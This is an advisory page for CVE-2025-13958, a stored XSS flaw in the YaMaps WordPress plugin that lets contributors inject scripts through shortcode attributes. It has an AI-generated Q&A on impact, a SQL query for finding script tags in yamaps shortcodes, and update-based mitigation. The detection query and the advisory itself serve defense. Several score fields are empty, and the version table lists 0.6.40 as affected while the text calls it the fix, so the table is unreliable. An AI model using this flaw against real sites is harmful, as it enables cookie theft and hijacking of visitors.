CVE-2025-13958
Stored XSS in YaMaps WordPress Plugin via Unescaped Shortcodes
Publication date: 2025-12-29
Last updated on: 2025-12-29
Assigner: WPScan
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| wordpress | wordpress_plugin | 0.6.40 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-UNKNOWN |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
The vulnerability in the YaMaps for WordPress Plugin (versions before 0.6.40) is due to the plugin not properly validating and escaping some of its shortcode attributes before displaying them on a page or post. This flaw allows users with contributor role or higher to inject malicious scripts that get stored and executed when the page is viewed, leading to Stored Cross-Site Scripting (XSS) attacks.
How can this vulnerability impact me? :
This vulnerability can allow attackers with contributor or higher privileges to execute malicious scripts in the context of the website. This can lead to unauthorized actions such as stealing user session cookies, defacing the website, redirecting users to malicious sites, or performing actions on behalf of other users, potentially compromising the security and integrity of the website and its users.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by checking if your WordPress site is running the YaMaps plugin version prior to 0.6.40. You can look for shortcode attributes in posts or pages that may contain unescaped or suspicious script tags. A practical approach is to search the WordPress database for shortcode usage with potentially malicious script injections. For example, you can run a SQL query on your WordPress database to find shortcode attributes containing script tags: SELECT * FROM wp_posts WHERE post_content LIKE '%[yamaps%script%]%'; Additionally, manual inspection of posts by users with Contributor role or higher for injected scripts can help detect exploitation. There are no specific network commands provided in the resources. [1]
What immediate steps should I take to mitigate this vulnerability?
The immediate step to mitigate this vulnerability is to update the YaMaps WordPress plugin to version 0.6.40 or later, where the issue has been fixed. Additionally, restrict the Contributor role or higher users from adding shortcodes until the update is applied, and review existing content for any malicious shortcode injections. Implementing proper input validation and escaping on shortcode attributes is essential, but updating the plugin is the primary and recommended mitigation. [1]